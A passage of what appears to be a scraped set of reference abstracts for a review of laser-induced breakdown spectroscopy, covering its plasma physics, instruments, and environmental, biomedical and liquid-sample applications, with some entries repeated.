foodstuffs, (2) estimating the degree of unsaturation of fatty acids included in foods, (3) investigating the structure of food components, and (4) monitoring changes in the quality of foods. Carotenoids included in foods give two intense bands near 1530 and 1160 cm−1 via the pre-resonance Raman effect in the NIR FT-Raman spectra, and therefore, the NIR FT-Raman technique can be employed to detect them nondestructively. Foods consisting largely of lipids such as oils, tallow, and butter show bands near 1658 and 1443 cm−1 due to C=C stretching modes of cis unsaturated fatty acid parts and CH2 scissoring modes of saturated fatty acid parts, respectively. It has been found that there is a linear correlation for various kinds of lipid-containing foods between the iodine value (number) and the intensity ratio of two bands at 1658 and 1443 cm−1 (I1658/I1443), indicating that the ratio can be used as a practical indicator for estimating the unsaturation level of a wide range of lipid-containing foods. A comparison of the Raman spectra of raw and boiled egg white shows that the amide I band shifts from 1666 to 1677 cm−1 and the intensity of the amide III band at 1275 cm−1 decreases upon boiling. These observations indicate that most α-helix structure changes into unordered structure in the proteins constituting egg white upon boiling. The NIR FT-Raman spectrum of old-leaf (about one year old) Japanese tea has been compared with that of its new leaf. The intensity ratio of two bands at 1529 and 1446 cm−1 (I1579/I1446), assignable to carotenoid and proteins, respectively, is considerably smaller in the former than in the latter, indicating that the ratio is useful for monitoring the changes in the quality of Japanese tea. --- paper_title: Trace elemental analysis by laser-induced breakdown spectroscopy—Biological applications paper_content: Abstract Laser-Induced Breakdown Spectroscopy (LIBS) is a sensitive optical technique capable of fast multi-elemental analysis of solid, gaseous and liquid samples. Since the late 1980s LIBS became visible in the analytical atomic spectroscopy scene; its applications having been developed continuously since then. In this paper, the use of LIBS for trace element determination in different matrices is reviewed. The main emphasis is on spatially resolved analysis of microbiological, plant and animal samples. --- paper_title: Laser-induced breakdown spectroscopy (LIBS): an overview of recent progress and future potential for biomedical applications. paper_content: The recent progress made in developing laser-induced breakdown spectroscopy (LIBS) has transformed LIBS from an elemental analysis technique to one that can be applied for the reagentless analysis of molecularly complex biological materials or clinical specimens. Rapid advances in the LIBS technology have spawned a growing number of recently published articles in peer-reviewed journals which have consistently demonstrated the capability of LIBS to rapidly detect, biochemically characterize and analyse, and/or accurately identify various biological, biomedical or clinical samples. These analyses are inherently real-time, require no sample preparation, and offer high sensitivity and specificity. This overview of the biomedical applications of LIBS is meant to summarize the research that has been performed to date, as well as to suggest to health care providers several possible specific future applications which, if successfully implemented, would be significantly beneficial to humankind. --- paper_title: Application of laser-induced breakdown spectroscopy to the analysis of algal biomass for industrial biotechnology paper_content: Abstract We report on the application of laser-induced breakdown spectroscopy (LIBS) to the determination of elements distinctive in terms of their biological significance (such as potassium, magnesium, calcium, and sodium) and to the monitoring of accumulation of potentially toxic heavy metal ions in living microorganisms (algae), in order to trace e.g. the influence of environmental exposure and other cultivation and biological factors having an impact on them. Algae cells were suspended in liquid media or presented in a form of adherent cell mass on a surface (biofilm) and, consequently, characterized using their spectra. In our feasibility study we used three different experimental arrangements employing double-pulse LIBS technique in order to improve on analytical selectivity and sensitivity for potential industrial biotechnology applications, e.g. for monitoring of mass production of commercial biofuels, utilization in the food industry and control of the removal of heavy metal ions from industrial waste waters. --- paper_title: Handbook of Laser-Induced Breakdown Spectroscopy paper_content: Foreword. Preface. Acronyms, Constants, And Symbol.s 1. History. 1.1 Atomic optical emission spectrochemistry (OES). 1.2 Laser-induced breakdown spectroscopy (LIBS). 1.3 LIBS History 1960-1980. 1.4 LIBS History 1980-1990. 1.5 LIBS History 1990-2000. 1.6 Active Areas of Investigation, 2000-2002. References. 2. Basics of the LIBS plasma. 2.1 LIBS plasma fundamentals. 2.2 laser-Induced Breakdown. 2.3 laser ablation. 2.4 double or multiple pulse libs. 2.5 summary. References. 3. Apparatus fundamentals. 3.1 Basic LIBS apparatus. 3.2 Lasers. 3.3 Optical systems. 3.4 Methods of spectral resolution. 3.5 Detectors. 3.6 Detection system calibration. 3.7 Timing considerations. 3.8 Methods of LIBS deployment. References. 4. Determining LIBS analytical figures-of-merit. 4.1 Introduction. 4.2 Basics of LIBS measurements. 4.3 precision. 4.4 Calibration. 4.5 Detection limit. References. 5. Qualitative LIBS Analysis. 5.1 Identifying elements. 5.2 Material identification. 5.3 Process control. References. 6. Quantitative LIBS Analysis. 6.1 Introduction. 6.2 Geometric Sampling Parameters. 6.3 Other sampling considerations. 6.4. Particle size. 6.5 use of internal standardization. 6.6 Chemical Matrix effects. 6.7. Example of libs measurement: Impurities in Lithium Solutions. 6.8 Reported figures of merit for LIBS measurements. 6.9 Conclusions. References. Chapter 7. REMOTE LIBS MEASUREMENTS. 7.1 Introduction. 7.2 Conventional open path LIBS. 7.3 Stand-off LIBS using Femtosecond pulses. 7.4 Fiber optic LIBS. References 8. Examples of recent LIBS fundamental research, instruments and novel applications. 8.1 Introduction. 8.2 fundamentals. 8.3 calibration-free LIBS. 8.4 laser and spectrometer advances. 8.5 surface analysis. 8.6 Double pulse studies and applications. 8.7 Steel applications. 8.8 libs for biological applications. 8.9 nuclear reactor applications. 8.10 LIBS for space applications. References. 9. THE FUTURE OF LIBS. 9.1 Introduction. 9.2 Expanding the understanding and capability of the libs process. 9.3 Widening the universe of libs applications. 9.4 Factors that will speed the commercialization of Libs. 9.5 conclusion. References. APPENDIX A: Safety Considerations in LIBS. A.1. safety plans. A.2 Laser Safety. A.3 Generation of Aerosols. A.4 laser pulse induced ignition. APPENDIX B: LIBS Application Matrix. APPENDIX C: LIBS Detection Limits. C.1 detection limits from the literature. C.2 uniform detection limits. APPENDIX D: Major LIBS References. Index. --- paper_title: Laser-Induced Breakdown Spectroscopy (LIBS), Part I: Review of Basic Diagnostics and Plasma—Particle Interactions: Still-Challenging Issues within the Analytical Plasma Community paper_content: Laser-induced breakdown spectroscopy (LIBS) has become a very popular analytical method in the last decade in view of some of its unique features such as applicability to any type of sample, practically no sample preparation, remote sensing capability, and speed of analysis. The technique has a remarkably wide applicability in many fields, and the number of applications is still growing. From an analytical point of view, the quantitative aspects of LIBS may be considered its Achilles' heel, first due to the complex nature of the laser-sample interaction processes, which depend upon both the laser characteristics and the sample material properties, and second due to the plasma-particle interaction processes, which are space and time dependent. Together, these may cause undesirable matrix effects. Ways of alleviating these problems rely upon the description of the plasma excitation-ionization processes through the use of classical equilibrium relations and therefore on the assumption that the laser-induced plasma is in local thermodynamic equilibrium (LTE). Even in this case, the transient nature of the plasma and its spatial inhomogeneity need to be considered and overcome in order to justify the theoretical assumptions made. This first article focuses on the basic diagnostics aspects and presents a review of the past and recent LIBS literature pertinent to this topic. Previous research on non-laser-based plasma literature, and the resulting knowledge, is also emphasized. The aim is, on one hand, to make the readers aware of such knowledge and on the other hand to trigger the interest of the LIBS community, as well as the larger analytical plasma community, in attempting some diagnostic approaches that have not yet been fully exploited in LIBS. --- paper_title: Laser-Induced Breakdown Spectroscopy: Fundamentals and Applications paper_content: Introduction.- Laser-induced breakdown spectroscopy.- Process parameters.- Instrumental components.- Evaporation and plasma generation.- Multiple-pulses for LIBS.- Material ablation.- Plasma dynamics and plasma parameters.- Plasma emission.- Modeling of plasma emission.- Quantitative analysis.- Combination of LIBS and LIF.- Bulk analysis of metallic alloys.- Bulk analysis of non-conducting materials.- Spatially resolved analysis.- Depth profiling.- LIBS instruments.- Industrial applications. --- paper_title: Laser-Induced Breakdown Spectroscopy (LIBS), Part II: Review of Instrumental and Methodological Approaches to Material Analysis and Applications to Different Fields paper_content: The first part of this two-part review focused on the fundamental and diagnostics aspects of laser-induced plasmas, only touching briefly upon concepts such as sensitivity and detection limits and largely omitting any discussion of the vast panorama of the practical applications of the technique. Clearly a true LIBS community has emerged, which promises to quicken the pace of LIBS developments, applications, and implementations. With this second part, a more applied flavor is taken, and its intended goal is summarizing the current state-of-the-art of analytical LIBS, providing a contemporary snapshot of LIBS applications, and highlighting new directions in laser-induced breakdown spectroscopy, such as novel approaches, instrumental developments, and advanced use of chemometric tools. More specifically, we discuss instrumental and analytical approaches (e.g., double- and multi-pulse LIBS to improve the sensitivity), calibration-free approaches, hyphenated approaches in which techniques such as Raman and fluorescence are coupled with LIBS to increase sensitivity and information power, resonantly enhanced LIBS approaches, signal processing and optimization (e.g., signal-to-noise analysis), and finally applications. An attempt is made to provide an updated view of the role played by LIBS in the various fields, with emphasis on applications considered to be unique. We finally try to assess where LIBS is going as an analytical field, where in our opinion it should go, and what should still be done for consolidating the technique as a mature method of chemical analysis. --- paper_title: The development of fieldable laser-induced breakdown spectrometer: No limits on the horizon paper_content: In this review, new trends in the development of fieldable instrumentation based on laser-induced breakdown spectroscopy (LIBS) and its recent applications is presented. Depending on the LIBS configuration we will distinguish between portable, remote and stand-off instruments. Moreover, the development of portable systems gives greater flexibility and also increases the range of LIBS applications. In general, portable instruments are employed in close-contact applications like immovable artworks, contaminated soils and environmental diagnostic, while remote and stand-off instruments are normally used in analytical applications at distances where access to the sample is difficult or hazardous. Although remote and stand-off instruments are both used for chemical analysis at distances, the instrumental configurations are completely different. In remote analysis, an optical fiber is employed to deliver the laser energy a certain distance. This approach has been usually restricted to industrial applications, bulk analysis in water, geological measurements and chemical analysis on nuclear stations. In the case of stand-off applications, the laser beam and the returning plasma light are transmitted in an open-path configuration. In this article we also discuss the instrumental requirements in the design of remote and stand-off instruments. --- paper_title: Characterization of laser induced plasmas by optical emission spectroscopy: A review of experiments and methods paper_content: Advances in characterization of laser induced plasmas by optical emission spectroscopy are reviewed in this article. The review is focused on the progress achieved in the determination of the physical parameters characteristic of the plasma, such as electron density, temperature and densities of atoms and ions. The experimental issues important for characterization by optical emission spectroscopy, as well as the different measurement methods are discussed. The main assumptions of the methods, namely the optical thin emission of spectral lines and the existence of local thermodynamic equilibrium in the plasma are evaluated. For dense and inhomogeneous sources of radiation such as laser induced plasmas, the characterization methods are classified in terms of the optical depth and the spatial resolution of the emission used for the measurements. The review deals firstly with optically thin spatially integrated measurements. Next, local measurements and characterization in not optically thin conditions are discussed. Two tables are included that provide reference to the works reporting measurements of electron density and temperature of laser induced plasmas generated with diverse samples. --- paper_title: Laser-induced breakdown spectroscopy (LIBS) : fundamenls and applications paper_content: Preface R. Russo and A. W. Miziolek 1. History and fundamentals of LIBS D. A. Cremers and L. J. Radziemski 2. Plasma morphology I. Schechter and V. Bulatov 3. From sample to signal in laser induced breakdown spectroscopy: a complex route to quantitative analysis E. Tognoni, V. Palleschi, M. Corsi, G. Cristoforetti, N. Omenetto, I. Gornushkin, B. W. Smith and J. D. Winefordner 4. Laser induced breakdown in gases: experiments and simulation C. G. Parigger 5. Analysis of aerosols by LIBS U. Panne and D. Hahn 6. Chemical imaging of surfaces using LIBS J. M. Vadillo and J. J. Laserna 7. Biomedical applications of LIBS H. H. Telle and O. Samek 8. LIBS for the analysis of pharmaceutical materials. S. Bechard and Y. Mouget 9. Cultural heritage applications of LIBS D. Anglos and J. C. Miller 10. Civilian and military environmental contamination studies using LIBS J. P. Singh, F. Y. Yueh, V. N. Rai, R. Harmon, S. Beaton, P. French, F. C. DeLucia, Jr., B. Peterson, K. L. McNesby and A. W. Miziolek 11. Industrial applications of LIBS R. Noll, V. Sturm, M. Stepputat, A. Whitehouse, J. Young and P. Evans 12. Resonance-enhanced LIBS N. H. Cheung 13. Short-pulse LIBS: fundamentals and applications R. E. Russo 14. High-speed, high resolution LIBS using diode-pumped solid state lasers H. Bette and R. Noll 15. LIBS using sequential laser pulses J. Pender, B. Pearman, J. Scaffidi, S. R. Goode and S. M. Angel 16. Micro LIBS technique P. Fichet, J-L, Lacour, D. Menut, P. Mauchien, A. Rivoallan, C. Fabre, J. Dubessy and M-C. Boiron 17. New spectral detectors for LIBS M. Sabsabi and V. Detalle 18. Spark-induced breakdown spectroscopy: a description of an electrically-generated LIBS-like process for elemental analysis of airborne particulates and solid samples A. J. R. Hunter and L. G. Piper. --- paper_title: Remote laser-induced plasma spectrometry for elemental analysis of samples of environmental interest paper_content: Remote laser-induced plasma spectrometry has been demonstrated as a valuable analytical tool both for qualitative inspection and quantitative determinations on environmental samples. For this objective, the pulsed radiation of a Q-switched Nd:YAG laser at 1064 nm has been used to produce a plasma in a remote sample, the light emission being collected under a coaxial open-path optical scheme and guided towards a spectrograph and then detected by an intensified CCD. A prospective study has been carried out to assess the suitability of the technique for the remote analysis of samples from a coastal scenario subjected to a high industrial activity. All the measurements have been done in the laboratory. Among the main factors influencing the analytical results, sample moisture and salinity, sample orientation and surface heterogeneity have been identified. The presence and distribution of Fe and Cr as a contaminant on sample surface has been quantified and discussed for samples including soil, rocks, and vegetation. At a stand-off distance of 12 m from the spectrometer to the sample, limits of detection in the order of 0.2% have been obtained for both elements. --- paper_title: Applications of laser-induced breakdown spectroscopy for geochemical and environmental analysis: A comprehensive review paper_content: Abstract Applications of laser-induced breakdown spectroscopy (LIBS) have been growing rapidly and continue to be extended to a broad range of materials. This paper reviews recent application of LIBS for the analysis of geological and environmental materials, here termed "GEOLIBS" . Following a summary of fundamentals of the LIBS analytical technique and its potential for chemical analysis in real time, the history of the application of LIBS to the analysis of natural fluids, minerals, rocks, soils, sediments, and other natural materials is described. --- paper_title: Review: Applications of single-shot laser-induced breakdown spectroscopy paper_content: As applications for laser-induced breakdown spectroscopy (LIBS) become more varied with a greater number of field and industrial LIBS systems developed and as the technique evolves to be more quantitative that qualitative, there is a more significant need for LIBS systems capable of analysis with the use of a single laser shot. In single-shot LIBS, a single laser pulse is used to form a single plasma for spectral analysis. In typical LIBS measurements, multiple laser pulses are formed and collected and an ensemble-averaged method is applied to the spectra. For some applications there is a need for rapid chemical analysis and/or non-destructive measurements; therefore, LIBS is performed using a single laser shot. This article reviews in brief several applications that demonstrate the applicability and need for single-shot LIBS. --- paper_title: Femtosecond Laser-Induced Breakdown Spectroscopy: Physics, Applications, and Perspectives paper_content: Progress in technology and society continually places new demands on analytical science and more powerful and informative methods need to be developed. One among them is laser-induced breakdown spectroscopy (LIBS), sometimes also referred to as LIPS (laserinduced plasma spectroscopy). Typically, LIBS measurements are conducted with nanosecond time scale lasers. A review by Song et al.1 and two recently published books by Miziolek et al.2 and Cremers et al.3 give a good overview of instrumental developments in this area. However, new developments in laser technology have made ultra-short lasers available4 and have stimulated an interest in LIBS with ultra-short pulses. There are fundamental differences between the ablation processes of ultra-short ( 1 ps) and short ( 1 ps) pulses that result in different mechanisms of energy dissipation in the sample. In the case of ultra-short laser pulses, at the end of the laser pulse, only a very hot electron gas and a practically undisturbed lattice are found, which subsequently interact. However, for longer pulses above a certain energy threshold, the material undergoes transient changes in the thermodynamic states from solid, through liquid, into a plasma state.5,6 Based on this difference, consequences for the analytical performance of the method can be expected that in the future should lead to new aspects in instrumentation and applications of LIBS. The goal of this review is to summarize current knowledge of the instrumentation and physics of laser ablation with femtosecond lasers and to draw some conclusions concerning new possible applications that rely on these specific new features. It seems clear that even if a better performance in terms of analytical figures of merit compared to standard LIBS applications7 is found, a replacement of current technology cannot be expected soon due to the cost and complexity of chirped pulse amplification (CPA) laser systems. However, current trends in other fields of application of these laser systems, e.g., medical laser applications or material processing,8 may change this picture in the near future. --- paper_title: Laser-induced breakdown spectroscopy for quantitative analysis of copper in algae paper_content: Laser-induced breakdown spectroscopy (LIBS) has been applied for quantitative analysis of Cu in algae plants, an issue of paramount importance for environmental monitoring. For the analysis with LIBS, algae were compacted into solid pellets with powdered calcium hydroxide addition as binder and a pulsed Nd:YAG laser was employed to produce the plasmas in air at atmospheric pressure. In this approach, atomic lines from traces of Cu were detected, as well as other major and minor elements. The plasma was characterized and a calibration curve was constructed with reference samples prepared with calcium hydroxide. The results obtained demonstrated the usefulness of the method for Cu monitoring in algae plants. --- paper_title: Laser Induced Breakdown Spectroscopy for Elemental Analysis in Environmental, Cultural Heritage and Space Applications: A Review of Methods and Results paper_content: Analytical applications of Laser Induced Breakdown Spectroscopy (LIBS), namely optical emission spectroscopy of laser-induced plasmas, have been constantly growing thanks to its intrinsic conceptual simplicity and versatility. Qualitative and quantitative analysis can be performed by LIBS both by drawing calibration lines and by using calibration-free methods and some of its features, so as fast multi-elemental response, micro-destructiveness, instrumentation portability, have rendered it particularly suitable for analytical applications in the field of environmental science, space exploration and cultural heritage. This review reports and discusses LIBS achievements in these areas and results obtained for soils and aqueous samples, meteorites and terrestrial samples simulating extraterrestrial planets, and cultural heritage samples, including buildings and objects of various kinds. --- paper_title: Laser-induced breakdown spectroscopy for analysis of plant materials: A review paper_content: Abstract Developments and contributions of laser-induced breakdown spectroscopy (LIBS) for the determination of elements in plant materials are reviewed. Several applications where the solid samples are interrogated by simply focusing the laser pulses directly onto a fresh or dried surface of leaves, roots, fruits, vegetables, wood and pollen are presented. For quantitative purposes aiming at plant nutrition diagnosis, the test sample presentation in the form of pressed pellets, prepared from clean, dried and properly ground/homogenized leaves, and the use of univariate or multivariate calibration strategies are revisited. --- paper_title: Comparing several atomic spectrometric methods to the super stars: special emphasis on laser induced breakdown spectrometry, LIBS, a future super star paper_content: The “super stars” of analytical atomic spectrometry are electrothermal atomization-atomic absorption spectrometry (ETA-AAS), inductively coupled plasma-atomic emission spectrometry (ICP-AES) and inductively coupled plasma-mass spectrometry (ICP-MS). Many other atomic spectrometric methods have been used to determine levels of elements present in solid, liquid and gaseous samples, but in most cases these other methods are inferior to the big three super star methods. The other atomic methods include glow discharge emission, absorption and mass spectrometric methods, laser excited fluorescence emission and ionization methods, and flame and microwave plasma emission and mass spectrometric methods. These “lesser” methods will be compared to the “super star” methods based on a number of figures of merit, including detection power, selectivity, multi-element capability, cost, applications, and “age” of the methods. The “age” of the method will be determined by a modification of the well-known Laitinen “Seven Ages of an Analytical Method” ::: (H.A. Laitinen, Anal. Chem., 1973, 45, 2305). Calculations will show that certain methods are capable of single atom detection, including several atomic absorption methods, as well as laser atomic ionization and fluorescence methods. The comparison of methods will indicate why the “super stars” of atomic spectrometric methods will continue to retain their status and what must be done for the lesser atomic methods to approach “super star” status. Certainly most of the lesser atomic spectrometric methods will have a limited place in the analytical arena. Because of the wide current interest and research activity, special emphasis will be placed on the technique of laser induced breakdown spectrometry (LIBS). Its current status and future developments will therefore be reviewed. --- paper_title: Application of laser-induced breakdown spectroscopy to the analysis of algal biomass for industrial biotechnology paper_content: Abstract We report on the application of laser-induced breakdown spectroscopy (LIBS) to the determination of elements distinctive in terms of their biological significance (such as potassium, magnesium, calcium, and sodium) and to the monitoring of accumulation of potentially toxic heavy metal ions in living microorganisms (algae), in order to trace e.g. the influence of environmental exposure and other cultivation and biological factors having an impact on them. Algae cells were suspended in liquid media or presented in a form of adherent cell mass on a surface (biofilm) and, consequently, characterized using their spectra. In our feasibility study we used three different experimental arrangements employing double-pulse LIBS technique in order to improve on analytical selectivity and sensitivity for potential industrial biotechnology applications, e.g. for monitoring of mass production of commercial biofuels, utilization in the food industry and control of the removal of heavy metal ions from industrial waste waters. --- paper_title: Quantitative analysis of toxic metals lead and cadmium in water jet by laser-induced breakdown spectroscopy paper_content: Laser-induced breakdown spectroscopy (LIBS) has been applied to the analysis of toxic metals Pb and Cd in Pb(NO3)2 and Cd(NO3)2.4H2O aqueous solutions, respectively. The plasma is generated by focusing a nanosecond Nd:YAG (λ=1064 nm) laser on the surface of liquid in the homemade liquid jet configuration. With an assumption of local thermodynamic equilibrium (LTE), calibration curves of Pb and Cd were obtained at different delay times between 1 to 5 μs. The temporal behavior of limit of detections (LOD) was investigated and it is shown that the minimum LODs for Pb and Cd are 4 and 68 parts in 106 (ppm), respectively. In order to demonstrate the correctness of the LTE assumption, plasma parameters including plasma temperature and electron density are evaluated, and it is shown that the LTE condition is satisfied at all delay times. --- paper_title: Determination of colloidal iron in water by laser-induced breakdown spectroscopy paper_content: Abstract Laser-induced breakdown spectroscopy was applied to the determination of FeO(OH) in water and successfully determined the concentration of the turbid solution down to a few ppm (μg ml −1 ). A Q-switched Nd:YAG laser, which delivered 8 ns pulses, was used as an excitation source. Cell-less measurement was achieved using a coaxial nozzle flow system which allowed to study the effect of ambient gas on emission intensity and decay lifetime of the breakdown plasma. Using helium gas and with a proper timing gate, the FeO(OH) concentration in water was determined in the ppm range. --- paper_title: Laser-Induced Breakdown Spectroscopy (LIBS), Part II: Review of Instrumental and Methodological Approaches to Material Analysis and Applications to Different Fields paper_content: The first part of this two-part review focused on the fundamental and diagnostics aspects of laser-induced plasmas, only touching briefly upon concepts such as sensitivity and detection limits and largely omitting any discussion of the vast panorama of the practical applications of the technique. Clearly a true LIBS community has emerged, which promises to quicken the pace of LIBS developments, applications, and implementations. With this second part, a more applied flavor is taken, and its intended goal is summarizing the current state-of-the-art of analytical LIBS, providing a contemporary snapshot of LIBS applications, and highlighting new directions in laser-induced breakdown spectroscopy, such as novel approaches, instrumental developments, and advanced use of chemometric tools. More specifically, we discuss instrumental and analytical approaches (e.g., double- and multi-pulse LIBS to improve the sensitivity), calibration-free approaches, hyphenated approaches in which techniques such as Raman and fluorescence are coupled with LIBS to increase sensitivity and information power, resonantly enhanced LIBS approaches, signal processing and optimization (e.g., signal-to-noise analysis), and finally applications. An attempt is made to provide an updated view of the role played by LIBS in the various fields, with emphasis on applications considered to be unique. We finally try to assess where LIBS is going as an analytical field, where in our opinion it should go, and what should still be done for consolidating the technique as a mature method of chemical analysis. --- paper_title: Application of laser-induced breakdown spectroscopy to in situ analysis of liquid samples paper_content: A realization of laser-induced breakdown spectroscopy for real-time, in situ and remote analysis of trace amounts in liquid samples is described, which is potentially applicable to the analysis of pollutants in water in harsh or difficult-to-reach environments. Most of the measurements were conducted using a fiber assembly that is capable of both delivering the laser light and collecting the light emitted from the micro plasma, up to about 30 m from the target area. Alternatively, a telescopic arrangement for line-of-sight measurements was employed, with a range of 3 to 5 m. For internal standardization and the generation of concentration calibration curves, reference lines of selected elements were used. In the majority of cases calibration against the matrix element hydrogen was employed using the H?, H?, and H? lines, but also spiking with selected reference species was utilized. In order to provide high reliability and repeatability in the analyses, we also measured plasma parameters such as electron density, plasma temperature, and line- shape functions, and determined their influence on the measurement results. Numerous elements, including a range of toxic heavy metals, have been measured over a wide range of concentrations (Al, Cr, Cu, Pb, Tc, U, and others). Limits of detection usually were in the range of a few parts per million; for several elements even lower concentrations could be measured. --- paper_title: Determination of an iron suspension in water by laser-induced breakdown spectroscopy with two sequential laser pulses. paper_content: We have applied laser-induced breakdown spectroscopy to quantitative analysis of colloidal and particulate iron in water. A coaxial sample flow apparatus developed in our previous work, which allowed us to control the atmosphere of laser-induced plasma, was used. Using sequential laser pulses from two Q-switched Nd:YAG lasers as excitation sources, the FeO(OH) concentration in the tens of ppb range was determined with an optimum interval between two laser pulses and an optimum delay time of a detector gate from the second pulse. The detection limit of Fe decreased substantially using two sequential laser pulse excitations: the 0.6 ppm limit of single pulse excitation to 16 ppb with sequential pulse excitation. The effects of the second laser pulse on the plasma emission were studied. The concentration of iron in fine particles in boiler water sampled from a commercially operated thermal power plant has been determined successfully by this method. The results show the capability of laser-induced breakdown spectroscopy in determining suspended colloidal and particulate impurities in a simple and quick way. --- paper_title: Investigation of laser-induced breakdown spectroscopy of a liquid jet paper_content: We investigate the feasibility of laser-induced breakdown spectroscopy for determination of heavy metal Pb in a Pb(NO3)2 aqueous solution by using a simple homemade vertical jet device and nanosecond laser pulses. Key experimental parameters that affect the analytical performance, such as delay of the time of observation, laser pulse energy, and liquid flow rate are optimized for the best limit of detection (LOD). The LOD was determined using Pb I emission at 405.781 nm, and after optimization, the 3σ LOD was found to be at the level of 60 ppm. --- paper_title: Study of laser-induced breakdown emission from liquid under double-pulse excitation. paper_content: The application of laser-induced breakdown spectroscopy to liquid samples, by use of a Nd:YAG laser in double-pulse excitation mode, is described. It is found that the line emission from a magnesium ion or atom is more than six times greater for double-pulse excitation than for single-pulse excitation. The effect of interpulse separation on the emission intensity of a magnesium ion and a neutral atom showed an optimum enhancement at a delay of 2.5–3 μs. The intensity of neutral atomic line emission dominates the ion emission from the plasma for higher interpulse (>10 μs) separation. A study of the temporal evolution of the line emission from the plasma shows that the background as well as line emission decays faster in double-pulse excitation than in single-pulse excitation. The enhancement in the emission seems to be dominated by an increase in the volume of the emitting gas. The limit of detection for a magnesium solution improved from 230 parts per billion (ppb) in single-pulse mode to 69 ppb in double-pulse mode. --- paper_title: Carbon emissions following 1.064 μm laser ablation of graphite and organic samples in ambient air paper_content: Laser ablation of graphite and organic samples is studied in the context of chemical analysis by laser-induced plasma spectroscopy. Ablation is performed using an Nd:YAG laser at 1.064 μm in ambient air at atmospheric pressure. Following ablation of graphite, we find results consistent with C2 (as well as C) being released directly from the target, and CN being formed later on by the interaction of C2 with atmospheric nitrogen (N2). In the case of organic compounds, we find a clear relationship between C2 emission from the plasma and the presence of aromatic rings (containing carbon–carbon double bonds) in the compounds. --- paper_title: Ultraviolet laser microplasma-gas chromatography detector: detection of species-specific fragment emission. paper_content: Characteristic laser-produced microplasma emissions from various simple carbon-containing vapors entrained in a He carrier gas have been observed and compared. A focused ArF (193-nm) excimer laser is used to induce microplasmas with modest pulse energies (15 mJ or less) in the effluent region of a gas chromatography capillary column. Strong atomic (C, H, O, Cl, and F) as well as molecular (C(2), CH, and CCI) emissions are observed with very high SNRs. A plasma emission survey indicates that different classes of molecule show unique spectra which make it relatively easy to distinguish one chemical class from another. These results suggest that a laser microplasma gas chromatography detector (LM-GCD) should offer additional discrimination/resolution for unknown sample gas mixture analysis. In addition, the LM-GCD exhibits a significant advantage over certain other GC detectors, like the widely used flame ionization detector, by readily detecting nonresponsive gases such as CO, CO(2), CCl(4) and Freons. --- paper_title: Application of laser-induced breakdown spectroscopy to the analysis of algal biomass for industrial biotechnology paper_content: Abstract We report on the application of laser-induced breakdown spectroscopy (LIBS) to the determination of elements distinctive in terms of their biological significance (such as potassium, magnesium, calcium, and sodium) and to the monitoring of accumulation of potentially toxic heavy metal ions in living microorganisms (algae), in order to trace e.g. the influence of environmental exposure and other cultivation and biological factors having an impact on them. Algae cells were suspended in liquid media or presented in a form of adherent cell mass on a surface (biofilm) and, consequently, characterized using their spectra. In our feasibility study we used three different experimental arrangements employing double-pulse LIBS technique in order to improve on analytical selectivity and sensitivity for potential industrial biotechnology applications, e.g. for monitoring of mass production of commercial biofuels, utilization in the food industry and control of the removal of heavy metal ions from industrial waste waters. --- paper_title: Laser-Induced Breakdown Spectroscopy (LIBS), Part II: Review of Instrumental and Methodological Approaches to Material Analysis and Applications to Different Fields paper_content: The first part of this two-part review focused on the fundamental and diagnostics aspects of laser-induced plasmas, only touching briefly upon concepts such as sensitivity and detection limits and largely omitting any discussion of the vast panorama of the practical applications of the technique. Clearly a true LIBS community has emerged, which promises to quicken the pace of LIBS developments, applications, and implementations. With this second part, a more applied flavor is taken, and its intended goal is summarizing the current state-of-the-art of analytical LIBS, providing a contemporary snapshot of LIBS applications, and highlighting new directions in laser-induced breakdown spectroscopy, such as novel approaches, instrumental developments, and advanced use of chemometric tools. More specifically, we discuss instrumental and analytical approaches (e.g., double- and multi-pulse LIBS to improve the sensitivity), calibration-free approaches, hyphenated approaches in which techniques such as Raman and fluorescence are coupled with LIBS to increase sensitivity and information power, resonantly enhanced LIBS approaches, signal processing and optimization (e.g., signal-to-noise analysis), and finally applications. An attempt is made to provide an updated view of the role played by LIBS in the various fields, with emphasis on applications considered to be unique. We finally try to assess where LIBS is going as an analytical field, where in our opinion it should go, and what should still be done for consolidating the technique as a mature method of chemical analysis. --- paper_title: Femtosecond time-resolved laser-induced breakdown spectroscopy for detection and identification of bacteria: A comparison to the nanosecond regime paper_content: Bacterial samples (Escherichia coli and Bacillus subtilis) have been analyzed by laser-induced breakdown spectroscopy (LIBS) using femtosecond pulses. We compare the obtained spectra with those resulting from the classical nanosecond LIBS. Specific features of femtosecond LIBS have been demonstrated, very attractive for analyzing biological sample: (i) a lower plasma temperature leading to negligible nitrogen and oxygen emissions from excited ambient air and a better contrast in detection of trace mineral species; and (ii) a specific ablation regime that favors intramolecular bonds emission with respect to atomic emission. A precise kinetic study of molecular band head intensities allows distinguishing the contribution of native CN bonds released by the sample from that due to carbon recombination with atmospheric nitrogen. Furthermore a sensitive detection of trace mineral elements provide specific spectral signature of different bacteria. An example is given for the Gram test provided by different magne... --- paper_title: Laser-induced breakdown spectroscopy (LIBS) : fundamenls and applications paper_content: Preface R. Russo and A. W. Miziolek 1. History and fundamentals of LIBS D. A. Cremers and L. J. Radziemski 2. Plasma morphology I. Schechter and V. Bulatov 3. From sample to signal in laser induced breakdown spectroscopy: a complex route to quantitative analysis E. Tognoni, V. Palleschi, M. Corsi, G. Cristoforetti, N. Omenetto, I. Gornushkin, B. W. Smith and J. D. Winefordner 4. Laser induced breakdown in gases: experiments and simulation C. G. Parigger 5. Analysis of aerosols by LIBS U. Panne and D. Hahn 6. Chemical imaging of surfaces using LIBS J. M. Vadillo and J. J. Laserna 7. Biomedical applications of LIBS H. H. Telle and O. Samek 8. LIBS for the analysis of pharmaceutical materials. S. Bechard and Y. Mouget 9. Cultural heritage applications of LIBS D. Anglos and J. C. Miller 10. Civilian and military environmental contamination studies using LIBS J. P. Singh, F. Y. Yueh, V. N. Rai, R. Harmon, S. Beaton, P. French, F. C. DeLucia, Jr., B. Peterson, K. L. McNesby and A. W. Miziolek 11. Industrial applications of LIBS R. Noll, V. Sturm, M. Stepputat, A. Whitehouse, J. Young and P. Evans 12. Resonance-enhanced LIBS N. H. Cheung 13. Short-pulse LIBS: fundamentals and applications R. E. Russo 14. High-speed, high resolution LIBS using diode-pumped solid state lasers H. Bette and R. Noll 15. LIBS using sequential laser pulses J. Pender, B. Pearman, J. Scaffidi, S. R. Goode and S. M. Angel 16. Micro LIBS technique P. Fichet, J-L, Lacour, D. Menut, P. Mauchien, A. Rivoallan, C. Fabre, J. Dubessy and M-C. Boiron 17. New spectral detectors for LIBS M. Sabsabi and V. Detalle 18. Spark-induced breakdown spectroscopy: a description of an electrically-generated LIBS-like process for elemental 